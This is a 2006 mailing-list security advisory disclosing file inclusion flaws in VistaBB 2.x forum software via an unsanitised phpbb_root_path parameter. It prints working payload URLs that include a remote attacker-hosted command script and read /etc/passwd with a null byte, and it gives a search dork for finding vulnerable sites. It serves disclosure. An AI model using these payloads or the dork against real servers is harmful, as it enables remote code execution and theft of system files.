Full Disclosure mailing list archives
Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities
From: "Mustafa Can Bjorn IPEKCI" <nukedx () nukedx com>
Date: Thu, 24 Aug 2006 06:04:26 +0300
--Security Report-- Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/08/06 03:00 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx () nukedx com Web: http://www.nukedx.com } --- Vendor: VistaBB (http://www.vistabb.net) Version: 2.033 and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to VistaBB.Variable phpbb_root_path did not sanitized properly before using it on includes/functions_mod_user.php and includes/functions_portal.php so remote attacker can include internal and external files to VistaBB For including internal files magic_quotes_gpc must be off on server settings because remote attacker needs to use null char at the end of filename. Eg: /etc/passwd%00 Level: Highly Critical --- How&Example: GET -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00 <- mq off GET -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off --- Timeline: * 24/08/2006: Vulnerability found. * 24/08/2006: Contacted with vendor and waiting reply --- Exploit: http://www.nukedx.com/?getxpl=48 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 --- Dorks: "Powered by VistaBB" _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Advisory: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities Mustafa Can Bjorn IPEKCI (Aug 24)